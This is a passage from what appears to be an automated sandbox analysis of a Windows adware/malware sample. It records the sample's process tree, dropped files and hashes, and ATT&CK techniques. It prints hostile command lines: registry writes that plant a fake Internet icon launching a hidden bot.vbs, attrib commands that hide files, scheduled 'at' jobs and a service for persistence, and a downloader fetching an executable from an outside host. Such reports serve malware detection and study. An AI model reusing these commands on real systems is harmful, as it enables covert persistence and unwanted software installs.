Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\LocalizedString = "@shdoclc.dll,-880"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2852	iexplore.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe
2128	cpa.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
2852	iexplore.exe
2852	iexplore.exe
2396	IEXPLORE.EXE
2396	IEXPLORE.EXE
888	msndown.exe
888	msndown.exe
888	msndown.exe
2396	IEXPLORE.EXE
2396	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2496 wrote to memory of 2724	2496	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe	30
PID 2496 wrote to memory of 2724	2496	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe	30
PID 2496 wrote to memory of 2724	2496	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe	30
PID 2496 wrote to memory of 2724	2496	c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe	30
PID 2724 wrote to memory of 2804	2724	WScript.exe	31
PID 2724 wrote to memory of 2804	2724	WScript.exe	31
PID 2724 wrote to memory of 2804	2724	WScript.exe	31
PID 2724 wrote to memory of 2804	2724	WScript.exe	31
PID 2804 wrote to memory of 2852	2804	cmd.exe	33
PID 2804 wrote to memory of 2852	2804	cmd.exe	33
PID 2804 wrote to memory of 2852	2804	cmd.exe	33
PID 2804 wrote to memory of 2852	2804	cmd.exe	33
PID 2724 wrote to memory of 2608	2724	WScript.exe	34
PID 2724 wrote to memory of 2608	2724	WScript.exe	34
PID 2724 wrote to memory of 2608	2724	WScript.exe	34
PID 2724 wrote to memory of 2608	2724	WScript.exe	34
PID 2608 wrote to memory of 2576	2608	cmd.exe	36
PID 2608 wrote to memory of 2576	2608	cmd.exe	36
PID 2608 wrote to memory of 2576	2608	cmd.exe	36
PID 2608 wrote to memory of 2576	2608	cmd.exe	36
PID 2852 wrote to memory of 2396	2852	iexplore.exe	38
PID 2852 wrote to memory of 2396	2852	iexplore.exe	38
PID 2852 wrote to memory of 2396	2852	iexplore.exe	38
PID 2852 wrote to memory of 2396	2852	iexplore.exe	38
PID 2608 wrote to memory of 2656	2608	cmd.exe	37
PID 2608 wrote to memory of 2656	2608	cmd.exe	37
PID 2608 wrote to memory of 2656	2608	cmd.exe	37
PID 2608 wrote to memory of 2656	2608	cmd.exe	37
PID 2608 wrote to memory of 2236	2608	cmd.exe	39
PID 2608 wrote to memory of 2236	2608	cmd.exe	39
PID 2608 wrote to memory of 2236	2608	cmd.exe	39
PID 2608 wrote to memory of 2236	2608	cmd.exe	39
PID 2608 wrote to memory of 1544	2608	cmd.exe	40
PID 2608 wrote to memory of 1544	2608	cmd.exe	40
PID 2608 wrote to memory of 1544	2608	cmd.exe	40
PID 2608 wrote to memory of 1544	2608	cmd.exe	40
PID 2608 wrote to memory of 1256	2608	cmd.exe	41
PID 2608 wrote to memory of 1256	2608	cmd.exe	41
PID 2608 wrote to memory of 1256	2608	cmd.exe	41
PID 2608 wrote to memory of 1256	2608	cmd.exe	41
PID 2608 wrote to memory of 2332	2608	cmd.exe	42
PID 2608 wrote to memory of 2332	2608	cmd.exe	42
PID 2608 wrote to memory of 2332	2608	cmd.exe	42
PID 2608 wrote to memory of 2332	2608	cmd.exe	42
PID 2608 wrote to memory of 1432	2608	cmd.exe	43
PID 2608 wrote to memory of 1432	2608	cmd.exe	43
PID 2608 wrote to memory of 1432	2608	cmd.exe	43
PID 2608 wrote to memory of 1432	2608	cmd.exe	43
PID 2608 wrote to memory of 352	2608	cmd.exe	44
PID 2608 wrote to memory of 352	2608	cmd.exe	44
PID 2608 wrote to memory of 352	2608	cmd.exe	44
PID 2608 wrote to memory of 352	2608	cmd.exe	44
PID 2608 wrote to memory of 1688	2608	cmd.exe	45
PID 2608 wrote to memory of 1688	2608	cmd.exe	45
PID 2608 wrote to memory of 1688	2608	cmd.exe	45
PID 2608 wrote to memory of 1688	2608	cmd.exe	45
PID 2608 wrote to memory of 1684	2608	cmd.exe	46
PID 2608 wrote to memory of 1684	2608	cmd.exe	46
PID 2608 wrote to memory of 1684	2608	cmd.exe	46
PID 2608 wrote to memory of 1684	2608	cmd.exe	46
PID 2608 wrote to memory of 2424	2608	cmd.exe	47
PID 2608 wrote to memory of 2424	2608	cmd.exe	47
PID 2608 wrote to memory of 2424	2608	cmd.exe	47
PID 2608 wrote to memory of 2424	2608	cmd.exe	47

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2576	attrib.exe
2656	attrib.exe
2236	attrib.exe

C:\Users\Admin\AppData\Local\Temp\c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c29087510295d91f0f0e08cb812324c9_JaffaCakes118.exe"
1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2496
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Program Files\Kingsoft\myfile\file.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?pc5566
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?pc5566
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2852
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2852 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\tool.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s ".\Microsoft\bot.vbs"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2576
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s ".\tool.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2656
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s ".\open.vbs"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2236
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1544
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1256
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2332
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1432
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:352
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1688
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1684
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2424
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:884
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1632
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1988
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1464
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1696
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1636
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "wscript.exe c:\progra~1\Kingsoft\myfile\Microsoft\bot.vbs" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1796
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1196
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1852
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1192
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1672
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2904
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2896
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2828
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\fav\fav.cmd
    3⤵
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:604
  - - C:\Windows\SysWOW64\sc.exe
      sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      System Service Discovery
      PID:660
  - - C:\Windows\SysWOW64\sc.exe
      sc config Schedule start= auto
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:300
  - - C:\Windows\SysWOW64\net.exe
      net start "Task Scheduler"
      4⤵
      System Location Discovery: System Language Discovery
      System Service Discovery
      PID:1768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        5⤵
        System Location Discovery: System Language Discovery
        System Service Discovery
        
        PID:392
  - - C:\Windows\SysWOW64\at.exe
      at 8:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:916
  - - C:\Windows\SysWOW64\at.exe
      at 11:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1112
  - - C:\Windows\SysWOW64\at.exe
      at 14:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:872
  - - C:\Windows\SysWOW64\at.exe
      at 17:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2920
  - - C:\Windows\SysWOW64\at.exe
      at 21:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1244
  - - C:\Windows\SysWOW64\at.exe
      at 23:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DBBBB}"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1572
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\360.cmd
    3⤵
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:952
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1836
  - - C:\Program Files\Kingsoft\myfile\soft\setup.exe
      "C:\Program Files\Kingsoft\myfile\soft\setup.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:908
  - - C:\Program Files\Kingsoft\myfile\soft\msn.exe
      "C:\Program Files\Kingsoft\myfile\soft\msn.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2204
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\msndown.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\msndown.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:888
  - - C:\Program Files\Kingsoft\myfile\soft\cpa.exe
      "C:\Program Files\Kingsoft\myfile\soft\cpa.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:2128
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del .\runonce.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Service Discovery

T1007

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Kingsoft\myfile\360.cmd

Filesize
1KB

MD5
3e54ff9d891714f4caf7911ce6d2ddce

SHA1
e7307a27eca905f1d8be37eed83731b541323707

SHA256
a3d8ffe9c729c41f8c9b276308c5f0be810e7855948e92a14c07e3e3672d9275

SHA512
1763f67d734af6d190416e618cf2be35be336f023f3df25827fbc45609509a49ea908d108fbb599c958f9224fc7749e16350c4d8812ff3be43e4f4fb423c1136

Download Submit
C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk

Filesize
104B

MD5
b26bdf8dd432f327015e14428a20790a

SHA1
a5db52d58ad5911ee4d54576335c250ccf86083e

SHA256
ff0f9b5b7634cadb7a4d58ccb1fa58c015217b6b890995c9ddc83156c9f8f43a

SHA512
a532c5b0a22e1cb09beab9d1acbe2a972a02d3a7c7782207410fe40f2a38316155dfc8de63be971ec1d69432ecd9033c971a588d65c40a5abb69d3f4792ba8d4

Download Submit
C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs

Filesize
173B

MD5
260221b2e318b36c446542c9edc50837

SHA1
d1041b615f1b1c513b27a8e9faa03abc7ff45d3f

SHA256
55c1c843af5160b59f214584e252c404d7857c33c8c13b08c9be7474d2f496e5

SHA512
a1c217ff54bf065ad4e1f337a436faf2b17bf20859b282b63f53b7430bac65ee3e0cd8a9b4ac054060095145f61c95bcaa4e5513331c69c8497cdc332322ac56

Download Submit
C:\Program Files\Kingsoft\myfile\cpa.cmd

Filesize
147B

MD5
c3e9df26e97da5adf239db77d4153331

SHA1
d2db1774b4f8d5e7e31de0e25c6781db751fe3f1

SHA256
bff0ee10b77f8badc3e205d255fc9912bea9e6244ecb4838fa21559eb4ff38b6

SHA512
67e8ac1dd8297a5915c47239d7e190abcdf5be600055c887bfb32e5aaae4baa9481ef4e378e7b71a7918dd3f4351f5b606eea34c5f319998d4675ac742acdc55

Download Submit
C:\Program Files\Kingsoft\myfile\fav\fav.cmd

Filesize
350B

MD5
bb8f16419df048980760537aa0381047

SHA1
fee995f3780355320925ca8368c7e93500ad1cd1

SHA256
80e3a0ae53a55fa995ebc555e8529f4d566d8f614b0933edbdf9ba2604d778fc

SHA512
9a2082a52cc1f84538002e5c16e5d6384854c129afb935d94122f1dcbf16064c8dbe59784b6332567b846c3dda48e441b2061228fdee9da2e4e552244a5450e0

Download Submit
C:\Program Files\Kingsoft\myfile\fav\tao.ico

Filesize
12KB

MD5
8320a22354a5419af035cdf42902ae93

SHA1
d9954707de08eaa6ecc7d13d69f76c51b316ebcc

SHA256
419408ac3e52f9b5878825dd3fc416a394ff5665208bbd36930ea52910be04bc

SHA512
592c4404292705321da9ec099ff60a22d396395acf31f900d4da661949a40c7966fcb20e7f8cadcd41c1dc729a290d68b21a74a352cb5b1b0a1b7b0ca1d5715b

Download Submit
C:\Program Files\Kingsoft\myfile\file.vbs

Filesize
1KB

MD5
853c5edb25a8a0084ca40d7d870a44a0

SHA1
0b212ee157afbbca5412f3655a1793179c23b518

SHA256
07a1ed641e79212fb19f9fcc7716288fb68613d3c5f9a99f9ad72c9e42482bf5

SHA512
1b63cd46e2d390de40165351d427f2bcc5eafedef9297a4dd1d3417bb40bac63db8a90d7b0631235cad0aaf1fad39ce63f0696e63967c978b22ffe7ccc3a7520

Download Submit
C:\Program Files\Kingsoft\myfile\open.vbs

Filesize
1002B

MD5
ae2af5c625b42c1e13cf26702cef7697

SHA1
eb0d7783826296ad37858870df932cbedc6d2342

SHA256
a50f01b0305d22c61988cac12af3449c0090f0a6c18ec412e5e8208740759bde

SHA512
55efed57559e803c62373076efdbc7c4006212380ed74dc5b81766bae479e67770c80a3b489061d45d5e652c1adc39436a791d70e5f774df1941d370836c1f5f

Download Submit
C:\Program Files\Kingsoft\myfile\runonce.cmd

Filesize
1KB

MD5
26546387c9729e1596eb8fd59106d300

SHA1
71ebf69d314ff28938a8addc85f66b023f8aeee7

SHA256
baf86a1340c31a317b43fc248813c6fc9ab54c9cca5aef1ce06c1ea74adcddf8

SHA512
fef7f7b7780f473c00fd6b0712664642258e838e377bb23280e3ce01c682e0ef2c259b52daa83429cddce47fff553f518be6631fe627cfbeb1c9172a1f69520c

Download Submit
C:\Program Files\Kingsoft\myfile\se.vbs

Filesize
185B

MD5
a73213963e201e9acfe8dbc0d600c8b9

SHA1
da47e1386f1ecfd8c74a921692c2ba1771809d45

SHA256
aa030802da33024e86cea9f904afab8faa02b525d94c8d967e10efda06996d1f

SHA512
1b9274253cdb5da75b13144df77e7e30c5b0490411b532c7414855185666c4b1ef2e376ae94208ff30e73424324539d780317e073311f1fc2ad04d3520aac617

Download Submit
C:\Program Files\Kingsoft\myfile\se1.vbs

Filesize
186B

MD5
c27ea5d91a982b0532daae2474d8db89

SHA1
64f064d3dc396519f270179a2afb3a2b12870147

SHA256
3a3ea968f86fa81532b2542de80d53cde5dde26315b8649fedd9b4d74643f0d7

SHA512
f450203d57cddebd4af434edaf3b5f7d336a787a13bb96cfff2db7f5f8074b3c65c48e1be9e0bf3d8e75c131166d2b4b0ee6f16b2e298955624584fac453cec0

Download Submit
C:\Program Files\Kingsoft\myfile\soft\cpa.exe

Filesize
30KB

MD5
14d36aa5385335e7f01c7e6c820f8b75

SHA1
83a0fafff4678f93d99fcc5169c04f85555dd9bb

SHA256
7b778d4b51090be8fce99624ab4f58e0ce8e02f8d9a27b52ba5c648f6064edf3

SHA512
7c36652529bc41a56e1af708df1c3f0a78ba69bc8afe7d174f561e62c90ee3a11bb9e0bfbfe539610cbc61f2051ca8947350a26d5e872fc464f101ea7c29361b

Download Submit
C:\Program Files\Kingsoft\myfile\soft\setup.exe

Filesize
116KB

MD5
c5e69e5e1797760bca9f29718359ee2c

SHA1
80a97b97048ab15074cb4c958cb8420d84872580

SHA256
d3cb7e606f42e56a40bf012f3a9ed6a56cfd16be31b7fad8fbc863955cdd4774

SHA512
e303e4446ad965d65f62681e69f242ed9c552f3a16d2d02382ef44e82593fa9d192b2729a29c40af5ffdef1f7308ed628f1323e102203d48665830bf1e27dbb5

Download Submit
C:\Program Files\Kingsoft\myfile\tool.cmd

Filesize
3KB

MD5
ac795c8b8e3ab538dc77cd97cc5eebd9

SHA1
75848f7608df47e2659978c15eb1180e00cdf3f2

SHA256
4ab8263a6c394af7168b1a03a4cd36e1a307456d6dcd09758ed9d4ec11e39c77

SHA512
c155cf6f1317c83c6913b89b46ef52833d7633b6ce101d492fe1a6ec8757b926cfc253701ca9e05d8b533ef6c37d7bc19c3495f80e431bd03f47ec4c4d301fb3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4e0858c7961c289759e38de213490538

SHA1
127a2963794d0957ba34f21b27ee71607c080b7c

SHA256
4aa76365a720afe2dc95311ba848258175c65adc389593a8991c149dce3701b1

SHA512
3b66ad552a304b74ffe93f805c8fd6c20d729a89bf48f8fab1d3d91323ac444e7c3c00b4a95a1d9f60293050efb4fa609413603334aaf0ab823bd9c7c1844d6b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
af49933c25889654f776c8a8b7341a0d

SHA1
f283ca8e47a616e08f44be19d51fb0455cea8065

SHA256
9f054a6c2eeadcb4b3fb779a35f98bd16bcfdd681f92fbebc05fb3ed575b91eb

SHA512
8ef1fbf367b76be8cedf62db8f3ad93097a44e71c9a647465c6fb71c6fd775a76bc2976984d1ca0e8afc66c80d11703b93082a890b85d000432ba7e6f3171fea

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
